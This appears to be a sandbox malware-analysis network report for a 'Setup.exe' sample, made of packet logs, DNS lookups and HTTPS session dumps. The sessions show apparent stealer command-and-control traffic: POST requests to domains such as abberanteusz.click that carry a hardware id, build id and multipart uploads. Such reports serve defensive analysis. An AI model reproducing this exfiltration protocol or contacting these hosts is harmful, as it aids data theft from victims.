                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.522977114 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.522984982 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.523991108 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.524003983 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.524071932 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.524081945 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.588666916 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.588684082 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.588761091 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.588773966 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.588968039 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.588990927 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589059114 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589066982 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589406013 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589423895 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589489937 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589498997 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589695930 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589711905 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589792013 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.589804888 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.590497017 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.590516090 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.590560913 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.590568066 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.590619087 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.612253904 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.612267017 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.612334013 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.612340927 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.613395929 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.613411903 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.613460064 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.613467932 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885330915 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885339975 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.885368109 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886434078 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886450052 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886485100 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886492968 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886512041 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.886534929 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.887506962 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951498985 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951514959 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951571941 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951581955 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951608896 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951649904 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951814890 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951828003 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951864958 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951872110 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951899052 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.951915026 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952081919 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952095985 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952137947 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952143908 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952152967 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952166080 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952178001 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952183008 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952209949 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952223063 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.952253103 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:26.954262972 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033876896 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033894062 CET44349745104.21.37.128192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033941031 CET49745443192.168.2.4104.21.37.128
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:27.033951998 CET44349745104.21.37.128192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 19:04:07.841656923 CET | 55329 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 19:04:07.854656935 CET | 53 | 55329 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 19:04:18.596878052 CET | 61820 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 19:04:18.651189089 CET | 53 | 61820 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 19:04:19.783797979 CET | 62987 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 19:04:19.793740034 CET | 53 | 62987 | 1.1.1.1 | 192.168.2.4
Jan 1, 2025 19:04:20.497229099 CET | 53897 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 19:04:20.506439924 CET | 53 | 53897 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 19:04:07.841656923 CET | 192.168.2.4 | 1.1.1.1 | 0xc43c | Standard query (0) | abberanteusz.click | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:18.596878052 CET | 192.168.2.4 | 1.1.1.1 | 0x798d | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:19.783797979 CET | 192.168.2.4 | 1.1.1.1 | 0x285b | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:20.497229099 CET | 192.168.2.4 | 1.1.1.1 | 0x1f7c | Standard query (0) | dfgh.online | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 19:04:07.854656935 CET | 1.1.1.1 | 192.168.2.4 | 0xc43c | No error (0) | abberanteusz.click |  | 172.67.198.102 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:07.854656935 CET | 1.1.1.1 | 192.168.2.4 | 0xc43c | No error (0) | abberanteusz.click |  | 104.21.74.46 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:18.651189089 CET | 1.1.1.1 | 192.168.2.4 | 0x798d | No error (0) | cegu.shop |  | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:19.793740034 CET | 1.1.1.1 | 192.168.2.4 | 0x285b | No error (0) | klipvumisui.shop |  | 104.21.37.128 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:19.793740034 CET | 1.1.1.1 | 192.168.2.4 | 0x285b | No error (0) | klipvumisui.shop |  | 172.67.208.58 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 19:04:20.506439924 CET | 1.1.1.1 | 192.168.2.4 | 0x1f7c | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                            • abberanteusz.click
                                                                                                                                                                                                                                                            • cegu.shop
                                                                                                                                                                                                                                                            • klipvumisui.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:08 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: abberanteusz.click
2025-01-01 18:04:08 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
2025-01-01 18:04:08 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:08 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=uf40m1003este2m7g2acai2125; expires=Sun, 27 Apr 2025 11:50:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAbbj%2BH7iGFJ3LWIi8XLbimZ9yJRTVPhqdrp%2F8iI%2BW8X3WWBTH9tf7J6FNJM6wC3d9W8Y6TBOs7pBYIVcO2SLiBi34K6TwWL1gsbDeUPkrcrgpcaZs2Rck6v3IIy65UpHngO6Zk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e18de5b8c41-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5528&min_rtt=1851&rtt_var=3063&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1577525&cwnd=225&unsent_bytes=0&cid=142fc68dfa298e1f&ts=484&x=0"
2025-01-01 18:04:08 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2025-01-01 18:04:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:09 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 77
                                                                                                                                                                                                                                                            Host: abberanteusz.click
2025-01-01 18:04:09 UTC | 77 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d
2025-01-01 18:04:09 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:09 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=d8rgibco7bj0ugg1chucjgu97h; expires=Sun, 27 Apr 2025 11:50:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCfFOgbwrdeBfpeioVG9Tg7aaJhGcmRwYbOR7e7T1x%2BgkISRfGUtGdPC%2FTEol2E%2FyObjlem5zNy%2F2yy%2BZG%2B5259DeuTq2pJTrsLDtQ9Xja3ICL9l9UNspYujupakrxKKSFkWiNA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e1eb9614328-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=979&delivery_rate=155236&cwnd=220&unsent_bytes=0&cid=4417f3f8c816dab1&ts=490&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:11 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6KMJCXQ2H9KXAAJ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18143
                                                                                                                                                                                                                                                            Host: abberanteusz.click
2025-01-01 18:04:11 UTC | 15331 | OUT | Data Raw: 2d 2d 36 4b 4d 4a 43 58 51 32 48 39 4b 58 41 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 36 4b 4d 4a 43 58 51 32 48 39 4b 58 41 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4b 4d 4a 43 58 51 32 48 39 4b 58 41 41 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 36 4b 4d 4a 43 58 51
                                                                                                                                                                                                                                                            Data Ascii: --6KMJCXQ2H9KXAAJContent-Disposition: form-data; name="hwid"6C50DBF4E642EF22C8E4375D48A51916--6KMJCXQ2H9KXAAJContent-Disposition: form-data; name="pid"2--6KMJCXQ2H9KXAAJContent-Disposition: form-data; name="lid"hRjzG3--GAS--6KMJCXQ
2025-01-01 18:04:11 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:11 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=27j423nnheurs4029189c3veda; expires=Sun, 27 Apr 2025 11:50:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKm5VDRDRzUrrHKA%2BRkgNwY%2Ba4aODluJvzwr%2FmT4uTsF2C6Ua84SqUqW%2Ff%2Blj46mgW6ZH8367XXORdokYtmmUJM4jUr8ft7wZUT9clpHbNRcpRKq8tcAaOiSoNeBVESGXVLm3us%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e2acf494356-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=45654&min_rtt=1617&rtt_var=26733&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19104&delivery_rate=1805813&cwnd=237&unsent_bytes=0&cid=292e71ddbaef9231&ts=566&x=0"
2025-01-01 18:04:11 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2025-01-01 18:04:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:12 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=LXYTJRBQ03JL
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8746
                                                                                                                                                                                                                                                            Host: abberanteusz.click
2025-01-01 18:04:12 UTC | 8746 | OUT | Data Raw: 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 4c 58 59 54 4a 52 42 51 30 33 4a 4c 0d 0a 43 6f
Data Ascii:
--LXYTJRBQ03JL
Content-Disposition: form-data; name="hwid"

6C50DBF4E642EF22C8E4375D48A51916
--LXYTJRBQ03JL
Content-Disposition: form-data; name="pid"

2
--LXYTJRBQ03JL
Content-Disposition: form-data; name="lid"

hRjzG3--GAS
--LXYTJRBQ03JL
Co
2025-01-01 18:04:12 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 01 Jan 2025 18:04:12 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=1uvuij86i10bhe9j3deohb5ucf; expires=Sun, 27 Apr 2025 11:50:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BM30ksnd1FmI7EHcWbjfJ0MybA3dvi3TzNDBs6O2rUCFYSrUvFpjfCRzy%2FtHWB4ws7Lme60gPkJXmekyYqYfy0srUmwl7q0lwCgkctri8Ah%2Fnz8V%2BCG5XClXr%2FyaYjddLjBLTfE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fb46e32289172a5-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1952&rtt_var=732&sent=6&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9681&delivery_rate=1495135&cwnd=203&unsent_bytes=0&cid=068dec0fc17c9364&ts=515&x=0"
2025-01-01 18:04:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f
ok 8.46.123.189
2025-01-01 18:04:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49735 | 172.67.198.102 | 443 | 7316 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 18:04:14 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=L57N9QSJ23X93STD
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20423
                                                                                                                                                                                                                                                            Host: abberanteusz.click
2025-01-01 18:04:14 UTC | 15331 | OUT | Data Raw: 2d 2d 4c 35 37 4e 39 51 53 4a 32 33 58 39 33 53 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 43 35 30 44 42 46 34 45 36 34 32 45 46 32 32 43 38 45 34 33 37 35 44 34 38 41 35 31 39 31 36 0d 0a 2d 2d 4c 35 37 4e 39 51 53 4a 32 33 58 39 33 53 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 35 37 4e 39 51 53 4a 32 33 58 39 33 53 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 4c 35 37 4e
Data Ascii:
--L57N9QSJ23X93STD
Content-Disposition: form-data; name="hwid"

6C50DBF4E642EF22C8E4375D48A51916
--L57N9QSJ23X93STD
Content-Disposition: form-data; name="pid"

3
--L57N9QSJ23X93STD
Content-Disposition: form-data; name="lid"

hRjzG3--GAS
--L57N
